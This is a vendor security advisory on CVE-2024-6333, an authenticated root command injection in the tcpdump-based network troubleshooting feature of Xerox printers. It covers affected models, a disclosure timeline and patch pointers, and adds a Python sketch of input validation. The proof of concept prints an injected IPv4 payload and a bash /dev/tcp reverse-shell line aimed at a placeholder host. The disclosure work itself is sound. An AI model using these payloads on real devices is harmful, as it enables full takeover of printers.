SEC Consult Vulnerability Lab Security Advisory < 20241023-0 >
=======================================================================
              title: Authenticated Remote Code Execution
            product: Multiple Xerox printers
                     (EC80xx, AltaLink, VersaLink, WorkCentre)
 vulnerable version: see vulnerable versions below
      fixed version: see solution section below
         CVE number: CVE-2024-6333
             impact: high
           homepage: https://xerox.com
              found: 2023-12-14
                 by: Timo Longin (Office Vienna)
                     Tamas Jos (Office Zurich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"We are a global leader in office and production print technology and
related solutions, with a large and growing presence in Digital and IT
Services. Having redefined the workplace experience for more than 100
years, our differentiated business and technology offerings are
empowering client success today by addressing the productivity
challenges of a hybrid workplace and distributed workforce."

Source: https://investors.xerox.com/


Business recommendation:
------------------------
SEC Consult recommends that Xerox customers install the latest updates
and review the vendor's security note for further information. Also make
sure to have patches from previous security notes installed, such as
XRX23-020. SEC Consult has re-identified some critical 0-days
(unauthenticated RCE, partial authentication bypass) that were already
patched but not clearly communicated in the previous security notes.

SEC Consult highly recommends performing a thorough security review of
the product, conducted by security professionals, to identify and resolve
potential further security issues.


Vulnerability overview/description:
-----------------------------------
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)
An attacker authenticated as a user with administrative access to the
web interface of a range of affected Xerox printers can exploit a remote
code execution (RCE) vulnerability as the root user. It allows the
attacker to execute commands directly on the operating system of the
printer with root permissions. Consequently, the target Xerox printer
can be fully compromised.


Proof of concept:
-----------------
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)
The "Network Troubleshooting" menu enables administrators to configure
and run network troubleshooting based on the tcpdump tool. The web
interface allows applying custom filters such as an IPv4 address as well
as specific network services, as seen in the image (figure 1) below.

Due to insufficient input validation of the IPv4 address value, an
attacker may inject further OS commands into the final tcpdump command
string. For example, by setting the IPv4 address to the value
"0.0.0.0$(bash $TMP~cmd)", commands stored under "/tmp/~cmd" are executed
when a network troubleshooting session is started.

Note: The payload in the IPv4 address must bypass a character filter, and
was kept simple for demonstration purposes. Other payloads that directly
execute commands without requiring the "/tmp/~cmd" file exist and can be
crafted.

An attacker who, for example, has previously exploited the
unauthenticated RCE vulnerability (fixed with Xerox Security Bulletin
XRX23-020) can plant the following commands for a reverse shell into
"/tmp/~cmd".

-------------------------------------------------------------------------------
bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1
-------------------------------------------------------------------------------

Since the network troubleshooting service runs tcpdump with root
permissions, full access to a range of Xerox printers can be obtained
this way.
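
The input-validation gap described above, as an added example (not taken
from the advisory or from Xerox firmware): the string-built command next
to a strict IPv4 parse and a shell-free argv. The service allow-list and
all function names are assumptions; the advisory does not show how the
firmware assembles its tcpdump command.

```python
import ipaddress

# Hypothetical service allow-list; the advisory does not enumerate the menu's options.
ALLOWED_SERVICES = {"http": 80, "https": 443, "snmp": 161, "ipp": 631}

# IPv4 field value quoted in the advisory's proof of concept.
ADVISORY_VALUE = "0.0.0.0$(bash $TMP~cmd)"


def unsafe_command_string(ipv4):
    """Anti-pattern: the field is pasted into text that a shell later parses,
    so $(...) in the value is expanded before tcpdump ever starts."""
    return "tcpdump -n host " + ipv4


def parse_ipv4(value):
    """Return the canonical dotted quad, or raise ValueError for anything else."""
    try:
        return str(ipaddress.IPv4Address(value))
    except ValueError as exc:  # AddressValueError is a ValueError subclass
        raise ValueError("rejected IPv4 filter value: %r" % (value,)) from exc


def build_tcpdump_argv(ipv4, services=()):
    """Build an argv list for exec-style launching (no shell involved).
    The filter expression travels as one argument and contains only a
    validated address plus port numbers taken from the allow-list."""
    expr = "host " + parse_ipv4(ipv4)
    ports = []
    for name in services:
        if name not in ALLOWED_SERVICES:
            raise ValueError("rejected service: %r" % (name,))
        ports.append("port %d" % ALLOWED_SERVICES[name])
    if ports:
        expr += " and (" + " or ".join(ports) + ")"
    return ["tcpdump", "-n", expr]


def invalid_filter_values(values):
    """Review helper: return stored field values that are not plain IPv4."""
    bad = []
    for value in values:
        try:
            parse_ipv4(value)
        except ValueError:
            bad.append(value)
    return bad


if __name__ == "__main__":
    print(build_tcpdump_argv("192.0.2.10", ["http", "snmp"]))
    # Constructed sample of saved field values, including the advisory's one.
    print(invalid_filter_values(["192.0.2.10", ADVISORY_VALUE, "10.0.0.5 or 1"]))
```
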
See figure 2 below.


Vulnerable versions:
--------------------
The following products and versions were tested initially; according to
the vendor, they were not patched to the latest version. Hence our other
identified critical security issues were removed from this advisory.

* Xerox Workcentre 7970 (073.200.167.09610)
* Xerox Workcentre 7855 (073.040.167.09610)

According to the vendor, the following products are affected:

* AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)
* AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)
* Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)
* Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)
* Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
* AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
* AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
* VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
* VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
* WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)
* WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)
* WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)
* WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)
* WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool)
* WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)
* WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)
* WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)
* WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)
* WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)


Vendor contact timeline:
------------------------
2024-02-05: Contacting vendor through the Xerox Security Response Center
            (XSRC)
            https://forms.business.xerox.com/en-us/xerox-security-response-center/
2024-02-06: Xerox assigns case id XSRC-2024-0003
2024-02-08: Xerox provides links for the current firmware versions to
            confirm whether the issues can be reproduced.
2024-02-27: Xerox asks for status update.
2024-02-28: The authenticated RCE was confirmed to be exploitable in the
            current firmware version (075.040.013.29000 and
            075.200.013.29000). Vulnerabilities one and two are fixed in
            the most recent versions.
2024-03-19: Xerox requests more information on provided PoCs.
2024-04-02: SEC Consult provides the requested information.
2024-04-18: SEC Consult asks for updates on the vulnerability status.
2024-05-06: Xerox provides an update/patch for the affected
            WorkCentre 7890 and 7855 series.
2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE
            vulnerability. SEC Consult also inquires about further plans
            for confirming the models and versions that are potentially
            affected by the partial authentication bypass and
            pre-authenticated RCE vulnerabilities.
2024-05-21: Xerox states that they are evaluating other models. Also,
            they request a CVSS score and vector for the authenticated
            RCE. Furthermore, more details on the public disclosure
            timeline are requested.
2024-05-23: SEC Consult provides the requested information.
2024-06-03: Status update from Xerox regarding CVE-ID request.
            Furthermore, more information on the to-be-released advisory
            is requested.
2024-06-06: Status update from Xerox regarding CVE-ID request.
2024-06-10: Xerox again requests a CVSS score and vector for the
            authenticated RCE.
2024-06-14: SEC Consult again provides the CVSS score and vector. Also,
            information on the to-be-released advisory is provided.
2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE
            vulnerability.
2024-06-28: Informing Xerox about longer vacation period / absence.
            Asking again about further affected models.
2024-07-01: Xerox: Further models are affected, will be shared in the
            final publication.
2024-07-16: Xerox asks for our publication draft.
2024-07-31: Xerox asks again for our publication draft.
2024-07-31: SEC Consult reminds Xerox about vacation, references our
            draft advisory already sent a few months ago. Asking whether
            the other models are affected by the authenticated RCE only,
            or by the other identified vulnerabilities as well.
2024-08-28: Xerox provides high-level summary of the case, but no details
            on affected models.
2024-10-03: SEC Consult provides an updated advisory with minor changes
            to Xerox, again asking whether other versions and models are
            affected by the described vulnerabilities.
2024-10-07: Xerox provides further information on the partial
            authentication bypass and pre-authenticated RCE
            vulnerabilities, showing that these have been addressed in
            previous patches. Also, further coordination regarding Xerox'
            Security Bulletin Release.
2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the
            authenticated RCE vulnerability.
2024-10-21: Sending latest advisory draft to Xerox, setting release date
            to 23rd October. Asking Xerox whether the security bulletin
            XRX23-020
            (https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf)
            is the correct one for the other issues and why there is no
            mention regarding our pre-auth RCE there.
            Xerox responds with the link to the latest XRX24-015 bulletin
            and that our advisory is fine.
2024-10-23: Coordinated release of advisory.


Solution:
---------
Xerox provided patches for the affected printers.
More information can be found in Xerox' Security Bulletin XRX24-015:
https://securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult,
an Eviden business. It ensures the continued knowledge gain of SEC
Consult in the field of network and application security to stay ahead
of the attacker. The SEC Consult Vulnerability Lab supports high-quality
penetration testing and the evaluation of new offensive and defensive
technologies for our customers. Hence our customers obtain the most
current information about vulnerabilities and valid recommendations
about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Timo Longin, Tamas Jos / @2024